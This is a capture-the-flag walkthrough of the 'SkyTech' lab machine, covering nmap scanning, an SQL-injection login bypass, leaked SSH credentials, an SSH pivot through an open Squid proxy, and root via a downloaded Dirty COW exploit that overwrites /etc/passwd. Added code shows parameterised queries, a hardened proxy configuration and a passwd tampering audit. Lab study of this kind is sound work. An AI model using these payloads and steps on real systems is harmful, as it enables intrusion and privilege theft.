
SkyTech

Since the machine has HTTP port 80 open, I'll filter on that port in the nmap scan.

┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ nmap 172.20.0.0/24 -p 80 --open
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-27 15:07 CET
...
Nmap scan report for 172.20.0.191
Host is up (0.0014s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:C0:0B:19 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
...
Nmap done: 256 IP addresses (48 hosts up) scanned in 25.73 seconds
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ nmap -T4 -sV -sC 172.20.0.191 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-27 15:16 CET
Nmap scan report for 172.20.0.191
Host is up (0.0069s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
3128/tcp open http-proxy Squid http proxy 3.1.20
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported: GET HEAD
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:C0:0B:19 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.68 seconds
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ curl http://172.20.0.191/
<html>
<body>
<div style="height:100%; width:100%;background-image:url('background.jpg');
background-size:100%;
background-position:50% 50%;
background-repeat:no-repeat;">
<div style="
background-color:white;
border-color: #000000;
border-width: 5px;
border-style: solid;
width: 300px;
height:180px;
position:absolute;
top:50%;
left:50%;
margin-top:-100px; /* this is half the height of your div*/
margin-left:-100px;
">
<form style="margin: 0 auto;width:250px;" action='login.php' method='POST'>
<br><strong>Skytech Login:</strong><br><br>
<label for="email" style="display: inline-block; width: 90px;" >E-mail:</label>
<input name="email" type="text" size=15 ><br><br>
<label for="password" style="display: inline-block; width: 90px;">Password:</label>
<input name="password" type="password" size=15><br><br>
<input type="submit" value="Login">
</form>
</div>
</div>
</body>
</html>
POST /login.php HTTP/1.1
Host: 172.20.0.191
Content-Length: 22
Cache-Control: max-age=0
Accept-Language: es-ES,es;q=0.9
Origin: http://172.20.0.191
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.20.0.191/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
email=asd&password=asd
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ sqlmap -r torres.req
___
__H__
___ ___[,]_____ ___ ___ {1.9.11#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:20:23 /2026-02-27/
...

http://172.20.0.191:3128/

proxy

┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ffuf -u http://172.20.0.191/FUZZ -w /mnt/d/Otros/wordlists/directory-list-2.3-big.txt -fc 404
/'___\ /'___\ /.___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://172.20.0.191/FUZZ
:: Wordlist : FUZZ: /mnt/d/Otros/wordlists/directory-list-2.3-big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________
index [Status: 200, Size: 1136, Words: 176, Lines: 34, Duration: 4431ms]
background [Status: 200, Size: 2572609, Words: 12795, Lines: 10401, Duration: 2ms]
email='&password=asd
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2026 14:34:35 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Content-Length: 189
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd'' at line 1]

' || 1=1 #

POST /login.php HTTP/1.1
Host: 172.20.0.191
Content-Length: 37
Cache-Control: max-age=0
Accept-Language: es-ES,es;q=0.9
Origin: http://172.20.0.191
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.20.0.191/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
email=%27+%7C%7C+1%3D1+%23&password=a
Welcome john@skytech.com
As you may know, SkyTech has ceased all international operations.
To all our long term employees, we wish to convey our thanks for your dedication and hard work.
Unfortunately, all international contracts, including yours have been terminated.
The remainder of your contract and retirement fund, $2 ,has been payed out in full to a secure account. For security reasons, you must login to the SkyTech server via SSH to access the account details.
Username: john
Password: hereisjohn
We wish you the best of luck in your future endeavors.
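The bypass above works because login.php splices the submitted e-mail straight into the SQL text (the verbose MySQL error shows the stray quote reaching the parser). The following is an added example, not code from the page or from the SkyTech machine: a vulnerable login check beside a parameterised one, run against an in-memory SQLite table. The table contents are constructed (only john's credentials come from the page), and the page's payload `' || 1=1 #` is MySQL spelling (`||` means OR in MySQL's default mode and `#` opens a comment), so the same idea is written as `' OR 1=1 --` for SQLite.

```python
import sqlite3

# Constructed sample data standing in for SkyTech's MySQL login table.
# Only john's credentials appear on the page; the second row is a placeholder.
USERS = [
    ("john@skytech.com", "hereisjohn"),
    ("sara@skytech.com", "PLACEHOLDER-NOT-FROM-PAGE"),
]

# The page's payload is `' || 1=1 #` (MySQL). Same trick in SQLite syntax:
PAYLOAD_SQLITE = "' OR 1=1 --"


def make_db():
    """In-memory stand-in for the application's database (constructed)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (email TEXT NOT NULL, password TEXT NOT NULL)")
    con.executemany("INSERT INTO login VALUES (?, ?)", USERS)
    return con


def login_vulnerable(con, email, password):
    """User input spliced into the SQL text, which is what login.php appears to do:
    a lone quote reached the parser and produced 'There was an error running the query'."""
    sql = "SELECT email FROM login WHERE email='%s' AND password='%s'" % (email, password)
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # Same class of information leak as the page's verbose error message.
        return "error: %s" % exc
    return row[0] if row else None


def login_safe(con, email, password):
    """Parameterised query: values travel separately from the SQL text, so a quote
    or comment marker in the input is data, never syntax."""
    sql = "SELECT email FROM login WHERE email=? AND password=?"
    row = con.execute(sql, (email, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run the four cases that matter and return the outcomes."""
    con = make_db()
    return {
        "vuln_quote": login_vulnerable(con, "'", "asd"),        # syntax error leaks out
        "vuln_bypass": login_vulnerable(con, PAYLOAD_SQLITE, "a"),  # first user returned
        "safe_bypass": login_safe(con, PAYLOAD_SQLITE, "a"),        # None: no such e-mail
        "safe_valid": login_safe(con, "john@skytech.com", "hereisjohn"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(case, "->", result)
```

Parameterisation removes the injection; it does not fix the other weakness visible on the page, namely plaintext passwords returned to the user. In a real fix the `password` column would hold a salted hash and the comparison would happen in application code after fetching the row by e-mail alone.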

The SSH port (22) is filtered, so it cannot be reached directly. To get in, it will most likely be necessary to go through the proxy.

A quick search shows how to make this kind of connection.

ssh USER@FINAL_DEST -o "ProxyCommand=nc -X connect -x PROXYHOST:PROXYPORT %h %p"

But it doesn't work on its own; the proxy type has to be specified as HTTP.

ProxyCommand /usr/bin/ncat --proxy-type http --proxy 172.18.10.1:3128 %h %p

┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ssh -t -o ProxyCommand="ncat --proxy 172.20.0.191:3128 --proxy-type http %h %p" john@localhost /bin/bash --noprofile --norc
The authenticity of host 'localhost (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is: SHA256:QYZqyNNW/Z81N86urjCUIrTBvJ06U9XDDzNv91DYaGc
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
john@localhost password:
Permission denied, please try again.
john@localhost's password:
bash-4.2$ id
uid=1000(john) gid=1000(john) groups=1000(john)
bash-4.2$ sudo -l
sudo: unable to resolve host ciber-5
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for john:
Sorry, user john may not run sudo on ciber-5.
bash-4.2$

We're in.
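The filtered port 22 was only a network-level block: Squid on the same host accepted a CONNECT to localhost:22 and tunnelled SSH through it (nmap had already flagged it as "Potentially OPEN proxy"). As an added example, not from the page or from the machine's own configuration, here is a squid.conf fragment with the permissive rule that produces this behaviour beside the restrictive ACL set modelled on Squid's shipped defaults; the 172.20.0.0/24 client range is an assumption.

```conf
# --- weak: any client may CONNECT to any host and port, including the proxy's own loopback ---
http_port 3128
http_access allow all

# --- corrected: only known clients, only web ports, CONNECT only to TLS ports, never to localhost ---
http_port 3128
acl localnet src 172.20.0.0/24            # assumed client network
acl SSL_ports port 443
acl Safe_ports port 80 21 443 70 210 280 488 591 777 1025-65535
acl CONNECT method CONNECT
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1

http_access deny !Safe_ports              # port 22 is not a safe port
http_access deny CONNECT !SSL_ports       # CONNECT restricted to 443
http_access deny to_localhost             # no pivot onto the proxy host itself
http_access allow localnet
http_access deny all                      # default deny last
```

With the corrected set, `ncat --proxy ... --proxy-type http localhost 22` receives a 403 from Squid instead of a tunnel, and the proxy's access.log records the denied CONNECT, which is the line a detection rule should watch for.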

┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ searchsploit linux kernel 3.2.0 privilege escalation
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1) | linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2) | linux/local/35161.c
Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation | linux/local/38390.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation | linux_x86-64/local/33516.c
Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3) | linux_x86-64/local/33589.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation | linux_x86-64/local/44302.c
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation | linux_x86-64/local/34134.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation | arm/local/31574.c
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation | linux_x86-64/local/44299.c
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2) | linux_x86-64/local/26131.c
Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation | linux/local/25450.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ searchsploit -m 38390
Exploit: Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/38390
Path: /usr/share/exploitdb/exploits/linux/local/38390.c
Codes: N/A
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/38390.c
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ cp 38390.c /mnt/d/Otros/
bash-4.2$ wget http://172.20.0.168/files/Otros/38390.c
--2026-02-27 10:01:35-- http://172.20.0.168/files/Otros/38390.c
Connecting to 172.20.0.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3762 (3.7K) [application/octet-stream]
Saving to: `38390.c'
100%[====================================================================================================================>] 3,762 --.-K/s in 0s
2026-02-27 10:01:36 (22.0 MB/s) - `38390.c' saved [3762/3762]
bash-4.2$ ls -la
total 28
drwx------ 2 john john 4096 Feb 27 10:01 .
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw-r--r-- 1 john john 3762 Feb 27 10:01 38390.c
-rw------- 1 john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20 2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile
bash-4.2$ chmod 777 38390.c
bash: gcc: command not found
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ gcc 38390.c -o exploit -static
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ cp exploit /mnt/d/Otros/
bash-4.2$ ./exploit
[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer
[+] Found myself: '/home/john/exploit'
[*] Parent waiting for boomsh to appear ...
[*] Setting up chroot ...
[-] link: Operation not permitted
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ searchsploit -m 40839
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40839
Path: /usr/share/exploitdb/exploits/linux/local/40839.c
Codes: CVE-2016-5195
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/40839.c
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ gcc -pthread 40839.c -o dirty -lcrypt -static
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ cp dirty /mnt/d/Otros/
bash-4.2$ wget http://172.20.0.168/files/Otros/dirty
--2026-02-27 10:07:16-- http://172.20.0.168/files/Otros/dirty
Connecting to 172.20.0.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1127608 (1.1M) [application/octet-stream]
Saving to: `dirty'
100%[====================================================================================================================>] 1,127,608 107K/s in 11s
2026-02-27 10:07:27 (102 KB/s) - `dirty' saved [1127608/1127608]
bash-4.2$ chmod 777 dirty
bash-4.2$ mv dirty /tmp
bash-4.2$ cd /tmp
bash-4.2$ ls -la
total 1112
drwxrwxrwt 2 root root 4096 Feb 27 10:07 .
drwxr-xr-x 24 root root 4096 Jun 20 2014 ..
-rwxrwxrwx 1 john john 1127608 Feb 27 10:07 dirty
bash-4.2$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fihn2.nq3JnMg:0:0:pwned:/root:/bin/bash
mmap: 7fe5a6e7f000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'asixcv'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ssh -t -o ProxyCommand="ncat --proxy 172.20.0.191:3128 --proxy-type http %h %p" john@localhost /bin/bash --noprofile --norc
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
john@localhost's password:
bash-4.2$ cat /etc/passwd
firefart:fihn2.nq3JnMg:0:0:pwned:/root:/bin/bash
/usr/g/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
john:x:1000:1000:john,,,:/home/john:/bin/bash
sara:x:1001:1001:,,,:/home/sara:/bin/bash
william:x:1002:1002:,,,:/home/william:/bin/bash
bash-4.2$ su firefart
Password:
firefart@ciber-5:/home/john# sudo -l
sudo: unknown user: root
sudo: unable to initialize policy plugin
firefart@ciber-5:/home/john# cd /root
firefart@ciber-5:~# ls -la
total 36
drwx------ 4 firefart root 4096 Jun 20 2014 .
drwxr-xr-x 24 firefart root 4096 Jun 20 2014 ..
drwx------ 2 firefart root 4096 Jun 20 2014 .aptitude
-rw------- 1 firefart root 265 Feb 3 15:03 .bash_history
-rw-r--r-- 1 firefart root 570 Jan 31 2010 .bashrc
-rwx------ 1 firefart root 69 Jun 20 2014 flag.txt
-rw------- 1 firefart root 268 Jun 20 2014 .mysql_history
-rw-r--r-- 1 firefart root 140 Nov 19 2007 .profile
drwx------ 2 firefart root 4096 Jun 20 2014 .ssh
firefart@ciber-5:~# cat flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
firefart@ciber-5:~#
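The `cat /etc/passwd` output above is the forensic fingerprint of this exploit: the `root` line has been overwritten by a new UID 0 account, the tail of the original second line survives as a malformed entry, the new account carries a password hash in `/etc/passwd` instead of `/etc/shadow`, and `/tmp/passwd.bak` is left behind. As an added example, not from the page or the machine, a small audit that turns those observations into checks; the embedded passwd excerpt is constructed from the listing on the page.

```python
import sys

# Constructed excerpt of the listing shown above: line 1 was overwritten by the
# exploit and the remainder of the original second line survives as junk.
SAMPLE_PASSWD = """\
firefart:fihn2.nq3JnMg:0:0:pwned:/root:/bin/bash
/usr/g/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
john:x:1000:1000:john,,,:/home/john:/bin/bash
"""

# Password-field values that mean "look in /etc/shadow" or "locked"; anything
# else is a hash (or plaintext) sitting in a world-readable file.
SHADOWED = {"x", "*", "!", ""}


def audit_passwd(text):
    """Return findings for one passwd file's contents."""
    findings = {
        "malformed": [],      # (line number, line) pairs that are not 7 colon-separated fields
        "extra_uid0": [],     # account names with UID 0 other than root
        "hash_in_passwd": [], # accounts whose password field is not shadowed
        "root_present": False,
    }
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings["malformed"].append((lineno, line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name == "root":
            findings["root_present"] = True
        if int(uid) == 0 and name != "root":
            findings["extra_uid0"].append(name)
        if pw not in SHADOWED:
            findings["hash_in_passwd"].append(name)
    return findings


def is_clean(findings):
    """True only when nothing in the file looks tampered with."""
    return (
        findings["root_present"]
        and not findings["malformed"]
        and not findings["extra_uid0"]
        and not findings["hash_in_passwd"]
    )


if __name__ == "__main__":
    # Usage: python audit_passwd.py [/etc/passwd]; without an argument the sample runs.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    result = audit_passwd(text)
    for key, value in result.items():
        print("%-15s %s" % (key, value))
    print("clean:", is_clean(result))
```

On a host this would be paired with a check for the `/tmp/passwd.bak` the exploit announces, and with file-integrity monitoring on `/etc/passwd`, since the Dirty COW write path does not go through the normal `chpasswd`/`usermod` tooling and leaves no entry in the usual authentication logs.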